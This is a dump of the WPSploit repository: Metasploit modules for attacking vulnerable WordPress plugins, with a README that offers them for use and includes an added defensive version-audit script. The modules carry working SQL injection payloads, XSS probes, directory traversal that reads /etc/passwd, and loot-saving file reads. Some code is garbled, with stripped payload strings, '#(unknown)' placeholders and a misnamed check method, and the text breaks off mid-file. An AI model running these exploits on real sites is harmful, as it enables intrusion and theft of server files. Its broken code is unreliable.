```text
.
├── LICENSE
├── README.md
├── documentation
│   ├── images
│   │   ├── wp_eshop_xss_scanner.png
│   │   ├── wp_ninja_forms_xss_scanner.png
│   │   ├── wp_thecartpress_xss_scanner.png
│   │   ├── wp_database_sync_xss_scanner.png
│   │   ├── wp_youtube_embed_xss_scanner.png
│   │   └── wp_visual_form_builder_xss_scanner.jpg
│   ├── auxiliary
│   │   ├── wp_aprils_super_function_xss_scanner.md
│   │   ├── wp_business_intelligent_sqli_scanner.md
│   │   ├── wp_visual_form_builder_xss_scanner.md
│   │   ├── wp_eshop_xss_scanner.md
│   │   ├── wp_social_media_and_share_xss_scanner.md
│   │   ├── wp_ninja_forms_xss_scanner.md
│   │   ├── wp_database_sync_xss_scanner.md
│   │   ├── wp_thecartpress_xss_scanner.md
│   │   └── wp_gimedia_library_file_read.md
│   └── exploits
│       ├── wp_reflexgallery_file_upload.md
│       ├── wp_creativecontactform_file_upload.md
│       ├── wp_worktheflow_file_upload.md
│       ├── wp_showbizpro_file_upload.md
│       ├── wp_inboundio_marketing_file_upload.md
│       ├── wp_wpshop_ecommerce_file_upload.md
│       ├── wp_xerteonline_file_upload.md
│       ├── wp_nmediawebsite_file_upload.md
│       ├── wp_woopra_analytics_file_upload.md
│       ├── wp_business_intelligence_file_upload.md
│       ├── wp_frontend_editor_file_upload.md
│       ├── wp_ultimate_product_catalogue_file_upload.md
│       ├── wp_woocommerce_file_upload.md
│       ├── wp_slideshowgallery_file_upload.md
│       └── wp_acf_frontend_display_file_upload.md
└── modules
    ├── auxiliary
    │   ├── scanner
    │   │   └── http
    │   │       ├── wp_mashshare_info_disclosure.rb
    │   │       ├── wp_store_locator_sqli.rb
    │   │       ├── wp_spreadsheet_xss_scanner.rb
    │   │       ├── wp_aprils_super_function_xss_scanner.rb
    │   │       ├── wp_ibs_mappro_file_read.rb
    │   │       ├── wp_attachment_export_file_download.rb
    │   │       ├── wp_business_intelligent_sqli_scanner.rb
    │   │       ├── wp_dukapress_file_read.rb
    │   │       ├── wp_mobileedition_file_read.rb
    │   │       ├── wp_ecommerce_shop_styling_file_read.rb
    │   │       ├── wp_gimedia_library_file_read.rb
    │   │       ├── wp_source_control_file_read.rb
    │   │       ├── wp_really_simple_guest_post_file_read.rb
    │   │       ├── wp_paypal_currency_converter_basic_for_woocommerce_file_read.rb
    │   │       ├── wp_se_html5_album_audioplayer_file_read.rb
    │   │       ├── wp_mobile_pack_info_disclosure.rb
    │   │       ├── wp_ninja_forms_xss_scanner.rb
    │   │       ├── wp_database_sync_xss_scanner.rb
    │   │       ├── wp_visual_form_builder_xss_scanner.rb
    │   │       ├── wp_font_file_read.rb
    │   │       ├── wp_elisqlreports_file_read.rb
    │   │       ├── wp_thecartpress_xss_scanner.rb
    │   │       ├── wp_cp_image_storage_file_read.rb
    │   │       ├── wp_eshop_xss_scanner.rb
    │   │       └── wp_social_media_and_share_xss_scanner.rb
    │   └── dos
    │       └── http
    │           └── wp_bulk_delete_dos.rb
    └── exploits
        └── unix
            └── webapp
                ├── wp_woopra_analytics_file_upload.rb
                ├── wp_creativecontactform_file_upload.rb
                ├── wp_inboundio_marketing_file_upload.rb
                ├── wp_wpshop_ecommerce_file_upload.rb
                ├── wp_business_intelligence_file_upload.rb
                ├── wp_ultimate_product_catalogue_file_upload.rb
                ├── wp_xerteonline_file_upload.rb
                ├── wp_worktheflow_file_upload.rb
                ├── wp_reflexgallery_file_upload.rb
                ├── wp_nmediawebsite_file_upload.rb
                ├── wp_acf_frontend_display_file_upload.rb
                ├── wp_woocommerce_file_upload.rb
                ├── wp_showbiz_file_upload.rb
                ├── wp_ajax_load_more_file_upload.rb
                └── wp_slideshowgallery_file_upload.rb
```

--------------------------------------------------------------------------------
/documentation/images/wp_eshop_xss_scanner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_eshop_xss_scanner.png

--------------------------------------------------------------------------------
/documentation/images/wp_ninja_forms_xss_scanner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_ninja_forms_xss_scanner.png

--------------------------------------------------------------------------------
/documentation/images/wp_thecartpress_xss_scanner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_thecartpress_xss_scanner.png

--------------------------------------------------------------------------------
/documentation/images/wp_database_sync_xss_scanner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_database_sync_xss_scanner.png

--------------------------------------------------------------------------------
/documentation/images/wp_youtube_embed_xss_scanner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_youtube_embed_xss_scanner.png

--------------------------------------------------------------------------------
/documentation/images/wp_visual_form_builder_xss_scanner.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/breakthenet/wpsploit/master/documentation/images/wp_visual_form_builder_xss_scanner.jpg

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
The MIT License (MIT)

Copyright (c) 2015 Roberto Soares

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
## WPSploit

#### WPSploit - Exploiting WordPress With Metasploit.

This repository is for creating and/or porting WordPress-specific exploits,
using Metasploit as the exploitation tool.

##### Currently:
44 modules (15 exploits and 29 auxiliaries)

##### Usage:
To use these modules, clone the repository and move the module trees into your Metasploit module directory:
```
# cd /tmp
# git clone https://github.com/espreto/wpsploit
# mv wpsploit/modules/auxiliary/ ~/.msf4/modules/
# mv wpsploit/modules/exploits/ ~/.msf4/modules/
# msfconsole
or
# cd /path/to/msf
# ./msfconsole
```
For details, see the official Metasploit documentation on ["Loading External Modules"](https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules).
All modules are created from entries in the [WPScan Vulnerability Database - WPVDB](https://wpvulndb.com/).

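Every module in this repository gates its `check` method on `check_plugin_version_from_readme(slug, fixed_version)`, which fetches the plugin's public readme.txt and compares the version found there with the first fixed release. The script below is an added example, not WPSploit's own code and not the Metasploit mixin, that reproduces that comparison offline so a site owner can audit a local `wp-content/plugins` directory against the fixed versions the modules name; the plugins path and the sample readme are assumptions.

```ruby
# Added example (not WPSploit's code and not the Metasploit mixin it calls):
# reproduces the readme.txt version comparison behind each module's `check`
# method so a site owner can audit a local wp-content/plugins directory.
require 'rubygems'

# Plugin slug => first fixed version, as passed to
# check_plugin_version_from_readme by the modules in this repository.
FIXED_VERSIONS = {
  'mashsharer'                    => '2.3.1',
  'store-locator'                 => '3.12',
  'dhtmlxspreadsheet'             => '2.1',
  'aprils-super-functions-pack'   => '1.4.8',
  'ibs-mappro'                    => '1.0',
  'wp-attachment-export'          => '0.2.4',
  'wp-business-intelligence-lite' => '1.6.2',
  'dukapress'                     => '2.5.7',
  'wp-mobile-edition'             => '2.3',
  'wp-ecommerce-shop-styling'     => '2.6',
  'gi-media-library'              => '3.0'
}.freeze

# Pull the version out of a WordPress plugin readme.txt. "Stable tag:" is
# checked first, then "Version:". Returns nil when neither carries a
# parseable version (e.g. "Stable tag: trunk"), so callers never guess.
def readme_version(readme)
  ['Stable tag', 'Version'].each do |key|
    m = readme.match(/^[ \t]*#{Regexp.escape(key)}[ \t]*:[ \t]*([0-9]+(?:\.[0-9]+)*)/i)
    return m[1] if m && Gem::Version.correct?(m[1])
  end
  nil
end

# :vulnerable when the readme version is below the fixed one, :fixed when it
# is equal or newer, :unknown when the slug is not tracked or no version could
# be read. Gem::Version compares segment by segment ("3.9" < "3.12").
def plugin_status(slug, readme)
  fixed = FIXED_VERSIONS[slug]
  return :unknown unless fixed
  installed = readme_version(readme)
  return :unknown unless installed
  Gem::Version.new(installed) < Gem::Version.new(fixed) ? :vulnerable : :fixed
end

# Walk a plugins directory (assumed layout: <dir>/<slug>/readme.txt, the
# standard WordPress layout) and return {slug => status} for tracked slugs.
def audit_plugins_dir(plugins_dir)
  results = {}
  Dir.glob(File.join(plugins_dir, '*')).sort.each do |dir|
    next unless File.directory?(dir)
    slug = File.basename(dir)
    next unless FIXED_VERSIONS.key?(slug)
    readme = Dir.children(dir).find { |f| f.casecmp?('readme.txt') }
    results[slug] = readme ? plugin_status(slug, File.read(File.join(dir, readme))) : :unknown
  end
  results
end

# Constructed sample readme, modelled on the WordPress readme.txt header format.
SAMPLE_README = <<~README
  === Store Locator ===
  Contributors: example
  Tags: map, locations
  Requires at least: 3.0
  Stable tag: 3.11
  License: GPLv2
README

if __FILE__ == $PROGRAM_NAME
  puts "sample readme: store-locator is #{plugin_status('store-locator', SAMPLE_README)}"
  dir = ARGV[0] || '/var/www/html/wp-content/plugins' # assumed path
  audit_plugins_dir(dir).each { |slug, status| puts "#{slug}: #{status}" } if File.directory?(dir)
end
```

Run it on the web server itself (or on a copy of the plugins directory) rather than over HTTP; a readme.txt that reports `trunk` or no version at all is deliberately reported as `unknown` rather than guessed.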
The public GitHub source repository can be found at:
https://github.com/espreto/wpsploit

Questions and suggestions can be sent to:
robertoespreto[at]gmail.com

31 | 32 | ##### Mentioned in a blog post by Rapid7/Metasploit: ["WordPress Exploitation Extravaganza"](https://community.rapid7.com/community/metasploit/blog/2015/06/05/weekly-metasploit-wrapup-and-were-back). 33 | 34 | 35 | Contributing 36 | -- 37 | 1. Fork it 38 | 2. Create your feature branch (```git checkout -b my-new-feature```) 39 | 3. Commit your changes (```git commit -am 'Add some feature'```) 40 | 4. Push to the branch (```git push origin my-new-feature```) 41 | 5. Create new Pull Request 42 | 43 | To Do: 44 | -- 45 | Missing some features, but it's a start. 46 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_mashshare_info_disclosure.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Mashshare Plugin Info Disclosure', 17 | 'Description' => %q{ 18 | This module attempts to exploit a information disclosure in Mashshare for WordPress, 19 | version 2.3.0 and likely prior in order if the instance is vulnerable. 
20 | }, 21 | 'Author' => 22 | [ 23 | 'James Hooker', # Vulnerability Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['OSVDB', '120988'], 30 | ['WPVDB', '7936'], 31 | ['URL', 'https://research.g0blin.co.uk/g0blin-00045/'] 32 | ], 33 | 'DisclosureDate' => 'Apr 25 2015' 34 | )) 35 | end 36 | 37 | def check 38 | check_plugin_version_from_readme('mashsharer', '2.3.1') 39 | end 40 | 41 | def run_host(ip) 42 | 43 | res = send_request_cgi( 44 | 'uri' => normalize_uri(wordpress_url_admin_ajax), 45 | 'vars_get' => { 46 | 'action' => '-', 47 | 'mashsb-action' => 'tools_tab_system_info' 48 | } 49 | ) 50 | 51 | unless res && res.body 52 | print_error("#{peer} - Server did not respond in an expected way") 53 | return 54 | end 55 | 56 | if res.code == 200 && res.body.include?('Site Info') 57 | print_good("#{peer} - Vulnerable to Information Disclosure the \"ViperGB 1.3.10\" plugin for WordPress") 58 | vprint_good("Information Disclosure: #{res.body}") 59 | p = store_loot('wp_mashshare', 'text/html', ip, res.body, 'tools_tab_system_info') 60 | print_good("Save in: #{p}") 61 | else 62 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 63 | end 64 | end 65 | end 66 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_store_locator_sqli.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Store Locator Unauthenticated SQL Injection Scanner', 17 | 
'Description' => %q{ 18 | This module attempts to exploit a SQL injection in Store Locator in version 19 | 2.3-3.11 and likely prior in order if the instance is vulnerable. 20 | }, 21 | 'Author' => 22 | [ 23 | 'g0blin', # Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | [ 'CVE', '2014-8621'], 30 | [ 'WPVDB', '8241' ] 31 | ], 32 | 'DisclosureDate' => 'Nov 05 2014' 33 | )) 34 | end 35 | 36 | def check 37 | check_plugin_version_from_readme('store-locator', '3.12') 38 | end 39 | 40 | def run_host(ip) 41 | flag = Rex::Text.rand_text_alpha(5) 42 | # TODO: Change the SQL injection to greater coverage 43 | sqli = ", information_schema.tables.table_name as #{flag} FROM wp_store_locator LEFT JOIN information_schema.tables ON 1=1--" 44 | vprint_status("#{peer} - Checking host") 45 | 46 | res = send_request_cgi( 47 | 'uri' => normalize_uri(wordpress_url_plugins, 'store-locator', 'sl-xml.php'), 48 | 'vars_get' => { 49 | 'sl_xml_customns[]' => flag, 50 | 'sl_custom_fields' => sqli 51 | } 52 | ) 53 | 54 | if res && res.body && res.body.include?('marker') 55 | print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Store Locator") 56 | vprint_line("#{res.body}") 57 | 58 | path = store_loot( 59 | 'storelocator.file', 60 | 'text/plain', 61 | ip, 62 | res.body 63 | ) 64 | print_good("#{peer} - File saved in: #{path}") 65 | else 66 | print_error("#{peer} - Server did not respond in an expected way") 67 | end 68 | end 69 | end 70 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_spreadsheet_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | 
include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Spreadsheet Plugin XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a Cross-Site Scripting in Spreadsheet for WordPress, 19 | version 2.0 and likely prior in order if the instance is vulnerable. 20 | }, 21 | 'Author' => 22 | [ 23 | 'ACC3SS', # Vulnerability Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['CVE', '2013-6281'], 30 | ['OSVDB', '98831'], 31 | ['WPVDB', '6980'], 32 | ['URL', 'http://packetstormsecurity.com/files/123699/'] 33 | ], 34 | 'DisclosureDate' => 'Oct 18 2013' 35 | )) 36 | end 37 | 38 | def check 39 | check_plugin_version_from_readme('dhtmlxspreadsheet', '2.1') 40 | end 41 | 42 | def run_host(ip) 43 | xss = Rex::Text.rand_text_alpha(8) 44 | 45 | res = send_request_cgi( 46 | 'uri' => normalize_uri(wordpress_url_plugins, 'dhtmlxspreadsheet', 'codebase', 'spreadsheet.php'), 47 | 'vars_get' => { 48 | 'page' => "\"'>" 49 | } 50 | ) 51 | 52 | unless res && res.body 53 | print_error("#{peer} - Server did not respond in an expected way") 54 | return 55 | end 56 | 57 | if res.code == 200 && res.body =~ /#{xss}/ 58 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the \"SPreadsheet Plugion 2.0\" plugin for WordPress") 59 | report_vuln( 60 | host: rhost, 61 | port: rport, 62 | proto: 'tcp', 63 | name: 'Cross-Site Scripting in Spreadsheet Plugin 2.0 for WordPress', 64 | refs: references 65 | ) 66 | else 67 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 68 | end 69 | end 70 | end 71 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_aprils_super_function_xss_scanner.rb: 
-------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress April\'s Super Function Pack XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a Cross-Site Scripting in April's Super Function 19 | Pack Plugin for WordPress, version 1.4.7 and likely prior in order if the instance is 20 | vulnerable. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Unknown', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2014-100026'], 31 | ['OSVDB', '101807'], 32 | ['WPVDB', '7068'] 33 | ], 34 | 'DisclosureDate' => 'Jan 06 2014' 35 | )) 36 | end 37 | 38 | def check 39 | check_plugin_version_from_readme('aprils-super-functions-pack', '1.4.8') 40 | end 41 | 42 | def run_host(ip) 43 | xss = Rex::Text.rand_text_alpha(8) 44 | 45 | res = send_request_cgi( 46 | 'uri' => normalize_uri(wordpress_url_plugins, 'aprils-super-functions-pack', 'readme.php'), 47 | 'vars_get' => { 48 | 'page' => "\"'>" 49 | } 50 | ) 51 | 52 | unless res && res.body 53 | print_error("#{peer} - Server did not respond in an expected way") 54 | return 55 | end 56 | 57 | if res.code == 200 && res.body =~ /#{xss}/ 58 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the \"April's Super Function Pack 1.4.7\" plugin for WordPress") 59 | report_vuln( 60 | host: rhost, 61 | port: rport, 62 | proto: 'tcp', 63 | name: 'Cross-Site Scripting in April\'s Super Function Pack 1.4.7 for WordPress', 64 | refs: references 65 | ) 66 | else 67 | 
print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 68 | end 69 | end 70 | end 71 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_ibs_mappro_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress IBS Mappro File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "WP IBS Mappro" version 0.6, allowing to read arbitrary files with the 20 | web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['CVE', '2015-5472'], 25 | ['WPVDB', '8091'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Larry W. 
Cashdollar', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']) 38 | ], self.class) 39 | end 40 | 41 | def check 42 | check_plugin_version_from_readme('ibs-mappro', '1.0') 43 | end 44 | 45 | def run_host(ip) 46 | filename = datastore['FILEPATH'] 47 | filename = filename[1, filename.length] if filename =~ /^\/\// 48 | 49 | res = send_request_cgi({ 50 | 'method' => 'GET', 51 | 'uri' => normalize_uri(wordpress_url_plugins, 'ibs-mappro', 'lib', 'download.php'), 52 | 'vars_get' => 53 | { 54 | 'file' => "#(unknown)" 55 | } 56 | }) 57 | 58 | if res && res.code == 200 && res.body.length > 0 59 | 60 | vprint_status('Downloading file...') 61 | vprint_line("\n#{res.body}") 62 | 63 | fname = datastore['FILEPATH'] 64 | 65 | path = store_loot( 66 | 'ibsmappro.traversal', 67 | 'text/plain', 68 | ip, 69 | res.body, 70 | fname 71 | ) 72 | 73 | print_good("#{peer} - File saved in: #{path}") 74 | else 75 | print_error("#{peer} - Nothing was downloaded. 
You can try again.") 76 | end 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_attachment_export_file_download.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Attachment Export File Download Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a vulnerability in WordPress Plugin "WP Attachment Export" 19 | version 0.2.3, allowing to download arbitrary files with the web server privileges. 20 | }, 21 | 'References' => 22 | [ 23 | ['WPVDB', '8103'], 24 | ['URL', 'https://packetstormsecurity.com/files/132693/'] 25 | ], 26 | 'Author' => 27 | [ 28 | 'Nitin Venkatesh', # Vulnerability discovery 29 | 'Roberto Soares Espreto ' # Metasploit module 30 | ], 31 | 'License' => MSF_LICENSE 32 | )) 33 | 34 | register_options( 35 | [ 36 | OptString.new('FILEPATH', [true, 'The path to the file to read', 'wp-attachment-export-download']), 37 | ], self.class) 38 | end 39 | 40 | def check 41 | check_plugin_version_from_readme('wp-attachment-export', '0.2.4') 42 | end 43 | 44 | def run_host(ip) 45 | filename = datastore['FILEPATH'] 46 | filename = filename[1, filename.length] if filename =~ /^\// 47 | 48 | res = send_request_cgi({ 49 | 'method' => 'GET', 50 | 'uri' => normalize_uri(wordpress_url_backend, 'tools.php'), 51 | 'vars_get' => 52 | { 53 | 'content' => "", 54 | "#(unknown)" => 'true' 55 | } 56 | }) 57 | 58 | if res && res.code == 200 && res.body.length > 0 59 | 60 | print_status('Downloading 
file...') 61 | vprint_line("\n#{res.body}") 62 | 63 | fname = datastore['FILEPATH'] 64 | 65 | path = store_loot( 66 | 'attachment-export.download', 67 | 'text/plain', 68 | ip, 69 | res.body, 70 | fname 71 | ) 72 | 73 | print_good("#{peer} - File saved in: #{path}") 74 | else 75 | print_error("#{peer} - Nothing was downloaded. You can try again.") 76 | end 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_business_intelligent_sqli_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Business Inteligence Lite SQLi Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit SQL injection in Business Intelligence 19 | Lite version 1.6.1 for WordPress and likely prior in order if the instance 20 | is vulnerable. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Jagriti Sahu', # Vulnerability Discovery - Correct? 
25 | 'Roberto Soares Espreto' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['WPVDB', '7879'], 31 | ['URL', 'http://packetstormsecurity.com/files/131228/'] 32 | ], 33 | 'DisclosureDate' => 'Apr 01 2015' 34 | )) 35 | 36 | register_options( 37 | [ 38 | OptInt.new('SLEEP', [true, 'Calculate the response time (default: 7)', 7]) 39 | ] 40 | ) 41 | end 42 | 43 | def check 44 | check_plugin_version_from_readme('wp-business-intelligence-lite', '1.6.2') 45 | end 46 | 47 | def run_host(ip) 48 | start_time = Time.now 49 | timeout = datastore['SLEEP'] 50 | 51 | print_status("#{peer} - Checking host...") 52 | 53 | res = send_request_cgi( 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'wp-business-intelligence-lite', 'view.php'), 55 | 'vars_get' => { 56 | 't' => "1 AND (SELECT * FROM (SELECT(SLEEP(#{timeout})))iqPT)" 57 | } 58 | ) 59 | 60 | end_time = Time.now - start_time 61 | 62 | unless res && res.body 63 | vprint_error("#{peer} - Server did not respond in an expected way") 64 | return 65 | end 66 | 67 | if res.code == 200 && end_time >= timeout 68 | print_good("#{peer} - Vulnerable to Unauth SQL Injection in \"Business Intelligence Lite 1.6.1\" plugin for WordPress") 69 | report_vuln( 70 | host: rhost, 71 | port: rport, 72 | proto: 'tcp', 73 | name: 'Unauth SQLi in Business Intelligence Lite 1.6.1 for WordPress', 74 | refs: references 75 | ) 76 | end 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_dukapress_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include 
Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress DukaPress Plugin File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "DukaPress" version 2.5.2, allowing to read arbitrary files with the 20 | web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['EDB', '35346'], 25 | ['CVE', '2014-8799'], 26 | ['WPVDB', '7731'], 27 | ['OSVDB', '115130'] 28 | ], 29 | 'Author' => 30 | [ 31 | 'Kacper Szurek', # Vulnerability discovery 32 | 'Roberto Soares Espreto ' # Metasploit module 33 | ], 34 | 'License' => MSF_LICENSE 35 | )) 36 | 37 | register_options( 38 | [ 39 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), 40 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]) 41 | ], self.class) 42 | end 43 | 44 | def check 45 | check_plugin_from_readme('dukapress', '2.5.7') 46 | end 47 | def run_host(ip) 48 | traversal = "../" * datastore['DEPTH'] 49 | filename = datastore['FILEPATH'] 50 | filename = filename[1, filename.length] if filename =~ /^\// 51 | 52 | res = send_request_cgi({ 53 | 'method' => 'GET', 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'dukapress', 'lib', 'dp_image.php'), 55 | 'vars_get' => 56 | { 57 | 'src' => "#{traversal}#(unknown)" 58 | } 59 | }) 60 | 61 | if res && res.code == 200 && res.body.length > 0 62 | 63 | print_status('Downloading file...') 64 | print_line("\n#{res.body}") 65 | 66 | fname = datastore['FILEPATH'] 67 | 68 | path = store_loot( 69 | 'dukapress.file', 70 | 'text/plain', 71 | ip, 72 | res.body, 73 | fname 74 | ) 75 | 76 | print_good("#{peer} - File saved in: #{path}") 77 | else 78 | print_error("#{peer} - Nothing was downloaded. 
You can try to change the DEPTH parameter.") 79 | end 80 | end 81 | end 82 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Mobile Edition File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a directory traversal vulnerability in WordPress Plugin 19 | "WP Mobile Edition" version 2.2.7, allowing to read arbitrary files with the 20 | web server privileges. Stay tuned to the correct value in TARGETURI. 
